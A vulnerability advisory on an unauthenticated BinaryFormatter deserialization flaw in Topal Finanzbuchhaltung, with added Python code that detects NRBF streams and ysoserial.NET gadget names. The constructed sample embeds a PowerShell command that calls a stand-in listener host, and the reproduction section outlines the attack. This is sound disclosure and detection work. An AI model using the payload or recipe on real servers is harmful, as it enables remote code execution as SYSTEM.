Topal Solutions AG Topal Finanzbuchhaltung Deserialization Vulnerability Leading to Unauthenticated Remote Code Execution

Vulnerability

A deserialization vulnerability leading to remote code execution has been identified in Topal Solutions AG's Topal Finanzbuchhaltung software for Windows, version 10.1.5.20. The Topal Server deserializes untrusted data received over the network with BinaryFormatter, a .NET serializer that is insecure when fed attacker-controlled input because it instantiates whatever types the stream names. The vulnerability can be exploited remotely and without authentication. Because the server process runs as SYSTEM, any code executed through it runs with SYSTEM privileges.

Impact

Successful exploitation gives an unauthenticated remote attacker code execution on the host running the Topal Server. The code runs under the SYSTEM account, which carries full permissions on that host.

Reproduction

To reproduce the issue, the header of a TCP message sent to the Topal Server is manipulated so that XML compression is disabled and BinaryFormatter is selected as the deserializer. The message body then carries a serialized payload that the server deserializes on receipt, executing the attacker's code. A suitable payload can be generated with ysoserial.NET, for example a gadget chain that launches PowerShell to make a web request to a listener controlled by the tester; the incoming request on that listener confirms that the injected code ran on the server.
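The page does not document the Topal message header, so the exchange itself cannot be shown here. What a tester or defender can check on the wire is whether a message body is a BinaryFormatter stream at all and whether it carries the type names that ysoserial.NET gadget chains leave in it. The following is an added example written for this page, not code from the advisory or from Topal Solutions AG: it parses the MS-NRBF SerializationHeaderRecord that every BinaryFormatter stream starts with, reads the BinaryLibrary record that usually follows it, and scans for a constructed watch-list of gadget indicators. The sample message is constructed inline (an NRBF header plus fake member bytes) and is not a real Topal message; the indicator list and the attacker URL are assumptions for illustration.

```python
import base64
import struct
from dataclasses import dataclass
from typing import Optional, Union

# MS-NRBF record type identifiers used below.
REC_SERIALIZATION_HEADER = 0x00
REC_BINARY_LIBRARY = 0x0C
REC_MESSAGE_END = 0x0B

# Base64 form of the 17-byte header (root id 1, header id -1, version 1.0),
# the prefix seen when a BinaryFormatter stream is transported as text.
BASE64_HEADER_PREFIX = "AAEAAAD/////AQAAAAAAAAA"

# Constructed watch-list: type names that ysoserial.NET BinaryFormatter gadget
# chains commonly embed. Extend it from your own captured samples.
GADGET_INDICATORS = [
    b"System.Diagnostics.Process",                 # Process.Start target of delegate gadgets
    b"System.Collections.Generic.SortedSet",       # TypeConfuseDelegate root object
    b"Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties",
    b"ActivitySurrogateSelector",
]


@dataclass
class NrbfHeader:
    root_id: int
    header_id: int
    major: int
    minor: int


def parse_nrbf_header(data: bytes) -> Optional[NrbfHeader]:
    """Return the SerializationHeaderRecord if data starts with one, else None."""
    if len(data) < 17 or data[0] != REC_SERIALIZATION_HEADER:
        return None
    root_id, header_id, major, minor = struct.unpack_from("<iiii", data, 1)
    if major != 1 or minor != 0:          # BinaryFormatter only ever writes 1.0
        return None
    return NrbfHeader(root_id, header_id, major, minor)


def read_length_prefixed_string(data: bytes, offset: int) -> tuple[str, int]:
    """Decode an NRBF LengthPrefixedString: 7-bit varint length, then UTF-8 bytes."""
    length, shift = 0, 0
    while True:
        b = data[offset]
        offset += 1
        length |= (b & 0x7F) << shift
        if not b & 0x80:
            break
        shift += 7
    return data[offset:offset + length].decode("utf-8"), offset + length


def encode_length_prefixed_string(s: bytes) -> bytes:
    """Inverse of read_length_prefixed_string, used only to build the sample."""
    n, out = len(s), bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out) + s


def first_binary_library(data: bytes) -> Optional[str]:
    """Assembly name of the BinaryLibrary record right after the header, if present."""
    off = 17
    if len(data) <= off or data[off] != REC_BINARY_LIBRARY:
        return None
    name, _ = read_length_prefixed_string(data, off + 5)   # skip record type + LibraryId
    return name


def assess(message: Union[bytes, str]) -> dict:
    """Classify a message body; accepts raw bytes or a base64 text transport."""
    data = base64.b64decode(message) if isinstance(message, str) else message
    header = parse_nrbf_header(data)
    if header is None:
        return {"binaryformatter": False, "library": None, "indicators": [], "verdict": "not an NRBF stream"}
    indicators = [i.decode() for i in GADGET_INDICATORS if i in data]
    verdict = "NRBF stream with known gadget indicators" if indicators else "NRBF stream, inspect manually"
    return {"binaryformatter": True, "library": first_binary_library(data),
            "indicators": indicators, "verdict": verdict}


def build_sample() -> bytes:
    """Constructed sample (not a real Topal message): header, BinaryLibrary, fake members, end."""
    header = bytes([REC_SERIALIZATION_HEADER]) + struct.pack("<iiii", 1, -1, 1, 0)
    library = (bytes([REC_BINARY_LIBRARY]) + struct.pack("<i", 2)
               + encode_length_prefixed_string(b"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"))
    members = (b"\x05...System.Collections.Generic.SortedSet`1...System.Diagnostics.Process...Start..."
               b"cmd /c powershell -c Invoke-WebRequest http://listener.example/ping")   # hypothetical callback URL
    return header + library + members + bytes([REC_MESSAGE_END])


if __name__ == "__main__":
    print(assess(build_sample()))
    print(assess(base64.b64encode(build_sample()).decode()))
    print(assess(b"<Message/>"))
```

The header check is the reliable part: the 17-byte record (and its `AAEAAAD/////AQAAAAAAAAA` base64 prefix) identifies a BinaryFormatter stream regardless of what gadget it carries, so it is the signal to alert on in front of a service that should never accept BinaryFormatter input from the network. The indicator scan only narrows down which chain was used and will miss payloads whose type names are obfuscated or split across records.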

Remediation

Upgrade to Topal Finanzbuchhaltung version 11.2.12.00, which addresses this vulnerability. Until the upgrade is in place, restricting network access to the Topal Server's listening port to trusted hosts reduces exposure; this is general mitigation advice rather than vendor guidance, and it does not remove the flaw.

Added: Oct 6, 2025, 5:36 PM
Updated: Oct 6, 2025, 5:36 PM